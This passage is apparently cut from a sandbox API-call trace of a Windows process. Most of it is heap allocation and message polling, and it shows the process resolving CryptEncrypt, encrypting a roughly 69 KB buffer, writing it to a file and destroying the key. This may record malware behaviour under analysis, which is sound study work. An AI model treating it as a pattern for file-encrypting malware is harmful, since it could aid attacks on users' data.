(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0245.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0245.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0245.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0245.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0245.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0245.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0245.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0245.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0245.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0245.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0245.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0245.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0245.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0245.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0245.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0245.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0245.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0245.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0245.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51568 [0245.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51568, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0245.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0245.426] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0245.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0245.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54490 [0245.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0245.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0245.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0245.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0245.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0245.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0245.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0245.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0245.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0245.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0245.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0245.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0245.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0245.427] CryptEncrypt (in: hKey=0xa87690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7f320*, pdwDataLen=0x8cef60*=0x10d6c, dwBufLen=0x10d70 | out: pbData=0x2e7f320*, pdwDataLen=0x8cef60*=0x10d70) returned 1 [0245.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0245.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0245.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0245.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0245.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0245.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0245.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0245.431] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0245.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0245.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0245.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0245.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0245.431] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.431] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0245.444] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0245.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0245.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0245.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0245.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0245.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0245.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0245.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0245.446] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0245.446] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0245.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0245.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0245.446] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0245.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0245.447] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0245.447] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0245.447] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0245.447] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0245.447] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0245.447] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0245.447] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0245.447] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0245.447] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0245.447] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0245.448] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.455] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.455] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.456] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.458] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f14010*, nNumberOfBytesToWrite=0x10d70, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14010*, lpNumberOfBytesWritten=0x8cf5e4*=0x10d70, lpOverlapped=0x0) returned 1 [0245.460] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.460] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.460] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0245.460] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0245.461] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0245.461] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0245.461] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0245.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0245.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51040, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0245.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0245.462] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0245.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0245.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0245.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0245.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0245.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0245.462] CryptDestroyKey (hKey=0xa87690) returned 1 [0245.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0245.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0245.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0245.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0245.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0245.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0245.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0245.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0245.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0245.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0245.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0245.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0245.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0245.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0245.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0245.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0245.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0245.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0245.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0245.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0245.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0245.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0245.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0245.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0245.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0245.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0245.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0245.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0245.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0245.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0245.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0245.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0245.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0245.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0245.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0245.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0245.464] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0245.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0245.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0245.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0245.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0245.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0245.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0245.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0245.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0245.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0245.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0245.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0245.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0245.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0245.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0245.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0245.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0245.464] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0245.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0245.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0245.465] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0245.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0245.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0245.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0245.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0245.465] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0245.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f10 [0245.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0245.465] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0245.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f10 | out: hHeap=0x970000) returned 1 [0245.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0245.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0245.465] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0245.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0245.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0245.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0245.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0245.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0245.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0245.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0245.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0245.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0245.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0245.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0245.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0245.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0245.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0245.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0245.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0245.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50dd0 [0245.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0245.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0245.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0245.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0245.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0245.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0245.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0245.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0245.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0245.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0245.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0245.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0245.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0245.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0245.467] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0245.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0245.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0245.467] PeekMessageW (in: 